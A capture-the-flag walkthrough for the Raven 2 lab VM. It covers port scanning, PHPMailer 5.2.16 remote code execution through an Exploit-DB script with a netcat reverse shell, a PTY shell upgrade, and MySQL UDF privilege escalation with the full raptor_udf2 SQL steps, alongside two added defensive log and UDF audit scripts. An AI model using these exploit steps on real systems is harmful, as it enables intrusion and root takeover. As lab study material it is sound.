Basic information
Target machine
Target VM:
Download: https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23z
Download (Mirror): https://download.vulnhub.com/raven/Raven2.ova
Download (Torrent): https://download.vulnhub.com/raven/Raven2.ova.torrent ( Magnet)
Difficulty: intermediate
Description: Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven?
Knowledge points and tools
nmap
dirb
searchsploit
phpmailer
mysql udf
gcc compilation
python -m SimpleHTTPServer
python -c 'import pty;pty.spawn("/bin/bash")'
nc
Information gathering
First, scan the network to locate the target's address:
Then run a full port scan against the target:
sudo nmap -p- -sV -v 192.168.10.129
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
33997/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:B8:7E:93 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Run nmap's vuln scripts against the discovered ports:
nmap -A -T4 -p 22,80,111,33997 --script=vuln -v 192.168.10.129
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.10.129
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.10.129:80/
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.10.129:80/team.html
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.10.129:80/service.html
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.10.129:80/contact.php
| Form id: myform
| Form action:
|
| Path: http://192.168.10.129:80/contact.php
| Form id:
| Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|
| Path: http://192.168.10.129:80/wordpress/
| Form id: search-form-5f1a943b4364f
|_ Form action: http://raven.local/wordpress/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wordpress/: Blog
| /wordpress/wp-login.php: Wordpress login page.
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| /manual/: Potentially interesting folder
|_ /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_http-server-header: Apache/2.4.10 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.10:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33997/tcp status
| 100024 1 50667/tcp6 status
| 100024 1 52526/udp status
|_ 100024 1 60374/udp6 status
33997/tcp open status 1 (RPC #100024)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory scan: enumerate directories with dirb, then browse to the paths it finds:
Under /vendor/PATH we find flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
The same directory contains PHPMailerAutoload.php. PHPMailer is a PHP library for sending e-mail directly from PHP, with no separate mail service to set up. README.txt shows version 5.2, and the VERSION file pins it to 5.2.16.
The other valuable find from the scan is the WordPress install.
Exploitation
1. Check searchsploit to see whether this PHPMailer version is exploitable. The results list several remote code execution scripts that apply to 5.2.16; try the Python one first.
2. Tried the msf module for PHPMailer; the exploit did not succeed.
3. Use the Python script instead: download 40974.py and read its usage:
Usage:
1 - Config your IP for reverse shell on payload variable
2 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
Modify the script:
Target IP: 192.168.10.129
Kali: 192.168.10.128
contact is the page on the target that sends mail
Add # -*- coding: utf-8 -*- at the top of the script to avoid encoding errors:
Open a terminal and start the listener on the chosen port:
Run the script (it must be run with python3):
Browse to http://192.168.10.129/contact.php to trigger creation of the logg12.php backdoor, then browse to http://192.168.10.129/log12.php to catch the reverse shell.
Upgrade to an interactive shell with python -c 'import pty;pty.spawn("/bin/bash")'
Run find / -name "flag*" to locate the flags;
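The chain above, seen from the web server's side: a form submission to contact.php is followed by a request to a PHP file that was never part of the deployed site. The following is an added example, not part of the original walkthrough or of 40974.py; it scans Apache combined-format access log lines for requests to PHP paths outside a baseline and notes whether the same client had just posted to the contact form. The log lines and the baseline are constructed.

```python
import re
from collections import defaultdict

# Apache combined log format: ip ident user [ts] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed baseline: PHP entry points that legitimately exist in the web root.
KNOWN_PHP = {"/contact.php", "/wordpress/index.php", "/wordpress/wp-login.php"}

# Constructed sample log, same shape as the server's access.log.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jul/2020:10:01:02 +0000] "GET /contact.php HTTP/1.1" 200 4123
10.0.0.5 - - [21/Jul/2020:10:01:09 +0000] "POST /contact.php HTTP/1.1" 200 512
10.0.0.5 - - [21/Jul/2020:10:01:15 +0000] "GET /log12.php HTTP/1.1" 200 0
10.0.0.9 - - [21/Jul/2020:10:02:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 9811
""".splitlines()

def parse(line):
    """Return the log fields as a dict, or None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_unexpected_php(lines, known=KNOWN_PHP):
    """Report requests to .php paths outside the baseline, with context."""
    posted_contact = defaultdict(bool)  # ip -> has POSTed to contact.php so far
    findings = []
    for line in lines:
        r = parse(line)
        if not r:
            continue
        path = r["path"].split("?", 1)[0]  # drop any query string
        if r["method"] == "POST" and path == "/contact.php":
            posted_contact[r["ip"]] = True
            continue
        if path.endswith(".php") and path not in known:
            findings.append({
                "ip": r["ip"], "path": path, "status": r["status"],
                "after_contact_post": posted_contact[r["ip"]],
            })
    return findings

if __name__ == "__main__":
    for f in find_unexpected_php(SAMPLE_LOG):
        print(f)
```

Pairing this with a file-integrity baseline of the web root (so a new .php file is caught even before anyone requests it) closes the gap between the form submission and the first hit on the backdoor.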
Privilege escalation
1. Escalating privileges needs more information about the Linux host
2. Upload LinEnum.sh
On Kali, serve the file with Python's HTTP server on port 8000
Download the file on the target
3. Run LinEnum.sh and review the output
Find the WordPress directory and its configuration file /var/www/html/wordpress/wp-config.php
It contains the database username and password:
Log in to the database and check the version; it is 5.5.60:
1518.c can be used to escalate privileges:
Compile it:
gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc
This produces 1518.so; upload it to the target:
Escalation steps:
Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*
* E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
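The UDF technique above depends on three conditions a defender can check: rows in mysql.func that nobody registered on purpose, a shared object in plugin_dir that the mysql user (rather than root) owns or can write, and an empty secure_file_priv, which is what lets "select ... into dumpfile" land a file in the plugin directory. The following audit is an added example, not part of the walkthrough or of raptor_udf2.c; all inputs (the mysql.func rows, the directory listing, the variables) are constructed to mirror the state the steps above leave behind.

```python
import stat

# Constructed: what "select * from mysql.func" might return (name, ret, dl, type)
FUNC_ROWS = [("do_system", 2, "1518.so", "function")]

# Constructed: plugin_dir listing as (filename, owner, permission bits)
PLUGIN_DIR = [
    ("1518.so", "mysql", 0o664),
    ("auth_socket.so", "root", 0o644),
]

# Constructed: a few server variables as reported by "show variables"
VARIABLES = {"secure_file_priv": "", "plugin_dir": "/usr/lib/mysql/plugin/"}

# A stock install defines no UDFs; list any deliberately installed libraries here.
ALLOWED_UDF_LIBS = set()

def audit_udfs(func_rows, plugin_dir, variables, allowed=ALLOWED_UDF_LIBS):
    """Return (severity, message) findings; an empty list means nothing suspicious."""
    findings = []
    # 1. Every registered UDF must come from an allowlisted library.
    for name, _ret, dl, _type in func_rows:
        if dl not in allowed:
            findings.append(("high", f"unexpected UDF {name} loaded from {dl}"))
    # 2. Shared objects in plugin_dir should be root-owned and not writable.
    for fname, owner, mode in plugin_dir:
        if not fname.endswith(".so"):
            continue
        if owner != "root":
            findings.append(("high", f"{fname} in plugin_dir owned by {owner}, not root"))
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(("medium", f"{fname} in plugin_dir is group/world writable"))
    # 3. An empty secure_file_priv lets INTO DUMPFILE write anywhere mysqld can.
    if variables.get("secure_file_priv", "") == "":
        findings.append(("medium",
            "secure_file_priv is empty: INTO DUMPFILE can write to any "
            "directory the mysql user can reach, including plugin_dir"))
    return findings

if __name__ == "__main__":
    for sev, msg in audit_udfs(FUNC_ROWS, PLUGIN_DIR, VARIABLES):
        print(f"[{sev}] {msg}")
```

The larger root causes on this box are that the web application's database account is the MySQL root user and that its password sits in a world-readable wp-config.php; a dedicated low-privilege database user removes the ability to create functions at all.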
Obtain flag4.txt
Summary
Understand the PHPMailer remote code execution vulnerability
- 1 - Config your IP for reverse shell on payload variable
- 2 - Open nc listener in one terminal: $ nc -lnvp
- 3 - Open other terminal and run the exploit: python3 anarcoder.py
The main idea: modify the script first, then visit the contact page to create a backdoor, then visit that backdoor to get a reverse shell back to Kali
MySQL UDF privilege escalation
- 1、gcc -g -c raptor_udf2.c
- 2、gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
- 3、mysql -u root -p
- 4、mysql> use mysql;
- 5、mysql> create table foo(line blob);
- 6、mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
- 7、mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
- 8、mysql> create function do_system returns integer soname 'raptor_udf2.so';
- 9、mysql> select * from mysql.func;
- 10、mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
- 11、mysql> \! sh
(For study notes only)